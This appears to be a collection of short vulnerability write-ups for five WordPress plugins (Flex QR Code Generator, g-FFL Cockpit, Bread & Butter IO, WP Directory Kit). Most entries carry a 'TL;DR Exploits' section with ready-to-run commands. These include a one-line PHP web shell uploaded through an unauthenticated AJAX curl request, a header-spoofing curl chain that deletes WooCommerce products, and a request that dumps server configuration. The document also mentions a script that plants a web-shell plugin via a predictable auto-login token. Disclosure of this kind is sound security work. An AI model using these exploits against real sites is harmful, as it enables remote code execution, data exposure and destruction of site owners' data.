CVE-2025-12673

The Flex QR Code Generator plugin does not validate user permission or sanitize file uploads in its update_qr_code AJAX endpoint, allowing unauthenticated attackers to upload arbitrary files including executable PHP scripts, leading to remote code execution.

TL;DR Exploits

# Upload PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "logo=@shell.php"

Details

The vulnerability exists in the update_qr_code method of the FlexQrCodeGenerator class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to upload arbitrary files that get stored in the WordPress uploads directory.

CVE-2025-12720

The g-FFL Cockpit plugin does not implement proper authorization checks on the queue and process REST API endpoints, allowing unauthenticated users to delete arbitrary WooCommerce products by spoofing HTTP headers to bypass IP-based authentication.

TL;DR Exploits

TARGET_SITE="http://example.com"
curl -X POST $TARGET_SITE/wp-json/fflcockpit/v1/queue -H "X-Forwarded-For: 3.212.185.187" -H "Content-Type: application/json" -d '{"action":"delete","products":[{"id":105}]}' && curl -X POST $TARGET_SITE/wp-json/fflcockpit/v1/process -H "X-Forwarded-For: 3.212.185.187" -H "Content-Type: application/json"

Details

The queue and process REST API endpoints use IP-based authentication that can be bypassed by spoofing the X-Forwarded-For or CF-Connecting-IP HTTP headers. The authentication mechanism relies on get_client_ip() which trusts user-controllable headers, and checks against a hardcoded IP address stored in the plugin source code.

CVE-2025-12721

The g-FFL Cockpit plugin does not implement proper authorization checks on the server_status REST API endpoint, allowing unauthenticated users to access sensitive server configuration information, PHP settings, database details, WordPress installation metadata, and active plugin information through an exposed public endpoint.

TL;DR Exploits

TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

Details

The handle_server_status() function in includes/class-sync-endpoint.php retrieves and exposes comprehensive server information without requiring any authentication or capability checks. The endpoint is registered with permission_callback => '__return_true', making it completely accessible to any unauthenticated visitor.

CVE-2025-12189

The Bread & Butter IO plugin contains a vulnerability in its image upload functionality that allows any attacker to trick authenticated administrators into uploading arbitrary files to the server, including PHP web shells, leading to Remote Code Execution (RCE). The vulnerability stems from the uploadImage() function lacking CSRF protection, allowing attackers to craft malicious requests that administrators’ browsers will automatically execute.

The vulnerability exists in the uploadImage() function in /bread-butter/src/Base/Ajax.php which lacks proper file validation and CSRF protection, while using file_put_contents() to write files directly to the WordPress uploads directory before any security checks.

CVE-2025-13390

The WP Directory Kit plugin for Wordpress version 1.4.4 and below contains an authentication bypass in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access to WordPress sites by exploiting a cryptographically broken token generation mechanism. The auto-login feature cannot be disabled and uses a predictable token that is derived solely from the MD5 hash of the user ID.

TL;DR Exploits

The CVE-2025-13390.sh file uploads a web shell plugin to a target site assuming user ID 1 is an administrator.